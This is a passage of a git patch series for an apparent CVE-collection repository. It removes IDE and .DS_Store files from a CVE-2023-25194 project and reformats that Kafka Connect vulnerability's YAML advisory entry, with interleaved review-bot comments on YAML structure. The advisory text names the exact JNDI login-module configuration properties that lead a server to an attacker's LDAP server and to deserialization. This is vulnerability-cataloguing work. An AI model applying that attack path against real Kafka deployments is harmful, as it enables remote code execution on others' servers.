--- a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml +++ /dev/null @@ -1,20 +0,0 @@ - - - - - - - - - - - \ No newline at end of file diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml deleted file mode 100644 index fe1451cb..00000000 --- a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml +++ /dev/null @@ -1,14 +0,0 @@ - - - - - - - - - - \ No newline at end of file -- Gitee From bb026949bee2f7e101eb825b2d9e7b74937c426a Mon Sep 17 00:00:00 2001 From: Bihe Zhao <13012563808@163.com> Date: Sat, 18 Mar 2023 23:11:37 +0800 Subject: [PATCH 4/7] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=A0=BC=E5=BC=8F?= =?UTF-8?q?=E9=97=AE=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CVE-2023-25194-java/.DS_Store | Bin 6148 -> 0 bytes .../CVE-2023-25194-java/src/.DS_Store | Bin 6148 -> 0 bytes .../CVE-2023-25194-java/src/main/.DS_Store | Bin 6148 -> 0 bytes .../2023/yaml/CVE-2023-25194.yaml | 18 +++++++++--------- 4 files changed, 9 insertions(+), 9 deletions(-) delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.DS_Store delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/.DS_Store delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/.DS_Store 
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.DS_Store deleted file mode 100644 index 437bf16d324cca9b1efd2231476295416454f8de..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHK&u`N(6n<{IHr0gG14z3dS=zN4WkviDmr%xm>oUOsP)U|*L}YQ*q!g*Dlr#J> zT=`4*ci8uA54Gz!4gq>kdj9O^?>Wh5%Z`aijppfnq8|56Gkv34- zG2)lGIZbktY;h&^TIy2(;^uV*ETa_U#k_hg!9Wi=T5P>p75r`-uU!EW#_`d}7O6<70e6wlsp>%^Em zxva;@t8B6u_ijHoMHOeoWM&hxbOOrT*IAL8#mLNyw6wXA>j=6*cih`sE{BgE_x12_ zxa#ZWlfyw@KNvn-t-8UT{d-T3#~<_a!hEqBkiuHGcFW@>d_~27^QUN5`l)$AaA(evS+;3Wx&#o&vl-XgFi&v36*;4ixqZ z0Bj*_4R!t%H(}D6djH5N&alz`ZzvoHT*rCjd``h lUn!{AqZnL1iud5w5Z7D*h8}B&h`{7Wz{((nDDX!WxB#1gc#i-8 diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/.DS_Store deleted file mode 100644 index a3a6aff4d353ba5afdaa1127b2d6ab7434c0d075..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKy-ve05I&bcQ&mVEKV31rceCnv@PzrOfa!tUL*? z19!HmXn_$#(VcYu?DL%+e~xS)0EkAvy$(l|_unVnHc{r?ZZC9Lntv;$a!<|~S;%wA6N27whyt1}?)Vhtjv3$_f3;ZvYEE;@= zN34w3bMN)yNXFM_BYz80=s*JL6dzC6_mK~5vM>Y805dR?44AXgF3#lF^G7oS%)n1F zK<9&lO6VHQG^(Qm3zY&O(lb&C*45J=(IEq(YcSJ@78IdF5p}3ADTXkagV5pF?;8J1 zqYek5X2x;M%)(?S!XzHTQSKmIja)JV%)lfAbGlig`~Tqk{C_ftTg(76@UIvUR?}-X za7pHF{j@l`YaP@}R1)&bG>${CqOM}}rK`A%ss!y0RS;c+nMSmr@Iye+zy&k#s|>sW Dwb)>d 
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/.DS_Store deleted file mode 100644 index 161d9f6e0c1fea4f00334944e674eb7c9f9fc825..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKO;6iE5S>j@u!Sn+P$Z6)dW}kotA3~#Hw}kgF)9bBf{i0^>w2R&A%`fE&+U)l z+F#PY18;Vh2m-yLf@Y-IH#<9Hd*52SJ4B><)9f`-n}|FpW5Y*tkMKC_9cegE3#j-R zUkZJa7CJ?rA1LzwGr()tqVJT@IVCIW_X%UKE{&LpEaTEyHFE3xCmj`eHR*Q$sz$T* zY;E0J_cpw5@tK~*lVmcjddc{Zd;3}!>9w7tU-RK?(0=h*my;wfhhvkFXG4S>9pq)E zXFWYFv&!VgcEIyJf6(5V&%<}`J3+V;E;_;d!%nvoyb0ef7QVOna{J@n;79SZ)W0nC z3jd{%=MJyoH;mLxSjiUK$J}d+EnFA z4CN{ZWz#Vpx%k?mO($jEjOVyFD_5Z?S9qwvgp-OaN-GQq1GgDy+HRZA|J{Gr|F@H* zCkzM!Pl^H6>c{;arsU4nJCozHHh>;OSvan?xJ-dzj$*{}QM?5;0)M~;FmhO1ga;xQ N0Yif{!oY(va0S~CVx#~7 diff --git a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml index 43b5846e..90d2e24e 100644 --- a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml +++ b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml 
@@ -4,15 +4,15 @@ source: info: name: Apache Kafka is a distributed event store and stream-processing platform. It is an open-source system developed by the Apache Software Foundation written in Java and Scala. severity: high - description: A possible security vulnerability has been identified in Apache Kafka Connect. - This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. - When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. - Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. - scope-of-influence: - Apache Kafka 2.3.0 - reference: - - https://github.com/ohnonoyesyes/CVE-2023-25194 - - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194 + description: | + A possible security vulnerability has been identified in Apache Kafka Connect. + This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. 
+ When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. + Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. + scope-of-influence: Apache Kafka 2.3.0 + reference: | + - https://github.com/ohnonoyesyes/CVE-2023-25194 + - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 -- Gitee From c090e822b80247da2d5c1241fee0ef8184cfd44c Mon Sep 17 00:00:00 2001 From: Bihe Zhao <13012563808@163.com> Date: Sat, 18 Mar 2023 23:15:02 +0800 Subject: [PATCH 5/7] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=A0=BC=E5=BC=8F?= =?UTF-8?q?=E9=97=AE=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml index 90d2e24e..1fe418f6 100644 --- a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml +++ b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml 
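Review bot: `reference: |` in this hunk turns the two `- https://...` entries into a single literal string, so `reference` stops being a YAML sequence and any tooling that iterates over it receives one blob instead of two URLs; `reference:` followed by the list items, which patch 5/7 restores, is the correct form, so this hunk and 5/7 should be squashed. The move to `description: |` is right. `scope-of-influence: Apache Kafka 2.3.0` is carried through unchanged and still names one version rather than the affected range.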
@@ -10,7 +10,7 @@ info: When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. scope-of-influence: Apache Kafka 2.3.0 - reference: | + reference: - https://github.com/ohnonoyesyes/CVE-2023-25194 - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194 classification: -- Gitee From 24dc5d27dd407b02fb13304e8eb49018b6ed0915 Mon Sep 17 00:00:00 2001 From: Bihe Zhao <13012563808@163.com> Date: Tue, 21 Mar 2023 16:36:46 +0800 Subject: [PATCH 6/7] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=A0=BC=E5=BC=8F?= =?UTF-8?q?=E9=97=AE=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml | 17 +++++++---------- 1 file changed, 7 insertions(+), 10 deletions(-) diff --git a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml index 1fe418f6..092fd0ea 100644 --- a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml +++ b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml 
@@ -5,19 +5,16 @@ info: name: Apache Kafka is a distributed event store and stream-processing platform. It is an open-source system developed by the Apache Software Foundation written in Java and Scala. severity: high description: | - A possible security vulnerability has been identified in Apache Kafka Connect. - This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. - When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. - Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. + A possible security vulnerability has been identified in Apache Kafka Connect. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. 
scope-of-influence: Apache Kafka 2.3.0 reference: - https://github.com/ohnonoyesyes/CVE-2023-25194 - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2023-25194 - cwe-id: CWE-502 - cnvd-id: None - kve-id: None + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-25194 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None tags: Deserialization of Untrusted Data \ No newline at end of file -- Gitee From 1937a7e46d6d0f7861616ee4ec68191f772dd567 Mon Sep 17 00:00:00 2001 From: Bihe Zhao <13012563808@163.com> Date: Mon, 3 Apr 2023 19:56:55 +0800 Subject: [PATCH 7/7] =?UTF-8?q?yaml=E6=96=87=E4=BB=B6=E4=BF=AE=E6=94=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml index 092fd0ea..cc9b4e96 100644 --- a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml +++ b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml @@ -8,8 +8,8 @@ info: A possible security vulnerability has been identified in Apache Kafka Connect. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. scope-of-influence: Apache Kafka 2.3.0 reference: - - https://github.com/ohnonoyesyes/CVE-2023-25194 - - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194 + - https://nvd.nist.gov/vuln/detail/cve-2023-25194 + - https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 -- Gitee
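Review bot: in the patch 1/7 hunk, `reference: |` turns the two `- https://…` lines into one multi-line string instead of a YAML sequence, so anything that reads `reference` as a list will break on this file; drop the `|` (patch 5/7 later does exactly that, so the two commits could be squashed). Also `scope-of-influence: Apache Kafka 2.3.0` names a single version while the description in the same hunk says the condition "has been possible on Kafka Connect clusters since Apache Kafka 2.3.0", so the field should state the affected range and the fixed release rather than one version.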
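Review bot: the `- reference: |` / `+ reference:` change in the 5/7 hunk is the correct fix for the block-scalar problem, but the flattened hunk does not show indentation, so verify that the two `- https://…` items sit under `reference:` at the same indent the other nested keys in this file use; a sequence at the wrong level parses as a sibling key (or fails to parse) rather than as the value of `reference`.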
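Review bot: the 6/7 hunk removes the precondition sentence along with the `JndiLoginModule` detail, and the resulting one-line description no longer says what access is required or why the CVSS vector carries `PR:L`; keep at least the precondition, e.g. `This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol.`, so a reader can judge whether a worker is exposed. Two smaller points in the same hunk: the re-indented `cvss-metrics:` … `kve-id:` block should be checked against the other yaml files in the repo, since the only change is leading whitespace, and the file still ends with `\ No newline at end of file`, so add the trailing newline. `cnvd-id: None` and `kve-id: None` are the string "None" in YAML rather than a null; use `null` (or omit the keys) unless the repo schema expects that literal.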
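Review bot: replacing the two GitHub PoC repositories with the NVD entry and the Apache announcement thread in the 7/7 hunk is the right direction, since the Apache thread is the vendor advisory; `scope-of-influence: Apache Kafka 2.3.0`, visible in this hunk's unchanged context, should be updated from that advisory in the same change. Minor: write the NVD URL with the canonical uppercase identifier (`https://nvd.nist.gov/vuln/detail/CVE-2023-25194`) so it matches the `cve-id: CVE-2023-25194` field below it.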
